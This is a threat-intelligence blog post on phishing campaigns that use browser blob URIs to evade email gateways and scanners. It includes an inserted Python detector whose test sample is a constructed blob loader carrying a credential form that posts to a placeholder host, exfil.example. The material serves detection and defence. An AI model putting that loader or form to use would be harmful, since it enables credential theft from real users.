Using Blob URLs to Bypass SEGs and Evade Analysis

May 7, 2025

By: Jacob Malimban, Intelligence Team

Starting in mid-2022, Cofense Intelligence detected a new technique for successfully delivering a credential phishing page to a user’s inbox: blob URIs (Uniform Resource Identifiers). A blob URI is generated by a browser to display and work with temporary data, and only the browser that generated it can access it. For example, YouTube uses blob URIs to temporarily store videos for a user’s browser.

Blob URIs have many legitimate uses for websites. Unfortunately, threat actors have also found blob URIs useful. Because the data is local to a client browser, blob URIs cannot be directly accessed over the internet like usual websites. Unlike most malicious sites, the final credential phishing page cannot be fetched by an analyst or scanner, because the blob URI used to visit it is generated locally. Since phishing via blob URIs is still a relatively uncommon tactic, AI models may not have learned how to distinguish between legitimate and malicious blob URIs. All these factors can make automatic analysis difficult. Combining an unusual technique with many redirects is a typical tactic threat actors use to bypass SEG defenses.

Key Points

  • Like other phishing techniques, blob URIs have legitimate uses, such as serving videos on YouTube, but can be abused to serve malicious content.
  • Blob URIs can be identified when the address bar starts with “blob:http://” or “blob:https://”.
  • The usage of blob URIs is expected to increase if it continues to bypass Secure Email Gateway (SEG) security.
  • Blob URIs reference local browser memory instead of a network location. They cannot be directly accessed over the internet, which can make it hard to automatically analyze them, leading to SEG and defender bypass.

What are Blob URIs?

Blobs, or binary large objects, can be used by a browser to work with temporary data. Typical blobs include binary data like pictures, audio, and PDF files. Blobs can be accessed using blob URIs. For example, blob URIs allow YouTube to serve videos without giving users direct access to the video file. Instead of anyone being able to access https://www.youtube.com/video.mp4, the video URL is obfuscated and then stored in a local blob accessible only to the user who generated it, at blob[:]hxxps[:]//www[.]youtube[.]com/a76c7f9e-ed99-4a6c-38e32-6bb8583a025.

Blobs allow for benefits like access control and reduced network traffic. Access control means only authorized users can view the video file, because the direct network video link is hidden. There is reduced network traffic for YouTube to process because the video can be stored locally in browser memory temporarily. Unfortunately, threat actors have found a way to use blob URIs in their attacks. Instead of containing legitimate binary data, blobs used by attackers contain credential phishing HTML pages, which are decoded and rendered locally.

Attack Flowchart

There appear to be multiple campaigns using blob URIs for credential phishing. Campaign lures for logging in include receiving an encrypted message, accessing your Intuit tax account, and reviewing an alert from a financial institution.

In general, campaigns using blob URI for credential phishing follow this process:

  1. A credential phishing email bypasses a SEG and is successfully delivered to an end-user.
  2. The email contains a link to an intermediary, allowlisted page.
  3. The allowlisted page (like onedrive[.]live[.]com) is abused by the threat actor to redirect to a malicious site. The allowlisted page contains a link to a threat actor-controlled HTML page.
  4. The HTML page crafted by the threat actor decodes an embedded HTML payload into a blob that is stored locally in the browser.
  5. The browser loads the blob URI, which renders the credential phishing page.
  6. Although the blob URI is accessible only locally, it contains functionality to exfiltrate credentials over the network to another threat actor endpoint.
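Because the blob page itself can never be fetched over the network, an analyst or SEG has to recover it from the loader page in step 4. The following is an added example, not Cofense's tooling: a static check that flags the blob-construction pattern in a page's HTML, decodes any embedded base64 HTML, and lists form actions that post to a host other than the loader's own. The sample loader, the phishing form and the `exfil.example` / `phish-loader.example` hosts are all constructed placeholders.

```python
import base64
import re

# Constructed sample of a step-4 loader page: the phishing HTML is base64-encoded
# inline, turned into a Blob and opened via a blob URI. Hosts are placeholders.
PHISH_HTML = ('<html><body><form action="https://exfil.example/collect" method="post">'
              '<input name="email"><input name="password" type="password">'
              '</form></body></html>')
SAMPLE_LOADER = ('<html><script>var d=atob("%s");'
                 'var b=new Blob([d],{type:"text/html"});'
                 'location.href=URL.createObjectURL(b);</script></html>'
                 % base64.b64encode(PHISH_HTML.encode()).decode())
# Constructed benign page: blob URI used for an in-browser download, no embedded HTML.
BENIGN_SAMPLE = ('<script>var u=URL.createObjectURL(new Blob([csv],{type:"text/csv"}));'
                 'a.href=u;a.download="report.csv";</script>')

BLOB_MARKERS = ("createObjectURL", "new Blob", "atob(")
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{40,}={0,2})["\']')
FORM_ACTION = re.compile(r'<form[^>]*action=["\']([^"\']+)["\']', re.I)


def analyze_loader(html, loader_host):
    """Statically inspect page HTML for the blob-URI phishing loader pattern.

    Returns the blob API markers seen, the decoded embedded HTML pages (if any),
    and form actions inside them that post to a host other than loader_host.
    A page is flagged only when blob construction AND embedded HTML coincide,
    so ordinary blob uses (video, downloads) are not flagged on their own.
    """
    markers = [m for m in BLOB_MARKERS if m in html]
    decoded = []
    for literal in B64_LITERAL.findall(html):
        try:
            text = base64.b64decode(literal, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or not text: skip it
        low = text.lower()
        if "<form" in low or "<html" in low:
            decoded.append(text)
    exfil = []
    for page in decoded:
        for action in FORM_ACTION.findall(page):
            if "://" in action and loader_host not in action:
                exfil.append(action)  # credentials leave for a third-party endpoint
    suspicious = len(markers) >= 2 and bool(decoded)
    return {"markers": markers, "decoded": decoded, "exfil": exfil,
            "suspicious": suspicious}
```

The decoded HTML can then be handed to the usual page analysis, which is what the blob URI otherwise prevents.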


Figure 1: Infection chain of a Blob URI phishing attack

Blob URI Content


Figure 2: Intermediary site before redirecting to the phishing site is onedrive[.]live[.]com, a legitimate Microsoft cloud location

After clicking on a phishing link, the victim usually lands on an allowlisted page. This means the phishing email will not be immediately blocked for containing links that go directly to a phishing page. In this campaign, the intermediary allowlisted page is Microsoft’s cloud storage, onedrive[.]live[.]com. A victim would have trouble identifying red flags, as the website is the real Microsoft page: no spoofing or fake subdomains were used in this step. The page claims a message was encrypted by Microsoft, so a Microsoft login is justified. However, in this case, clicking on “Sign in” redirects to a threat-actor-controlled HTML page. Once that page loads, it generates an HTML blob locally and displays it via a blob URI.


Figure 3: A blob URI page spoofing a OneDrive login

After automatically loading the blob URI, the credential phishing page is shown in Figure 4. Like all blob URIs, this phishing page is only accessible to the browser that generated it. In this instance, threat actors spoofed a OneDrive login. Entering credentials into any of the options will exfiltrate the email address and password to the threat actors.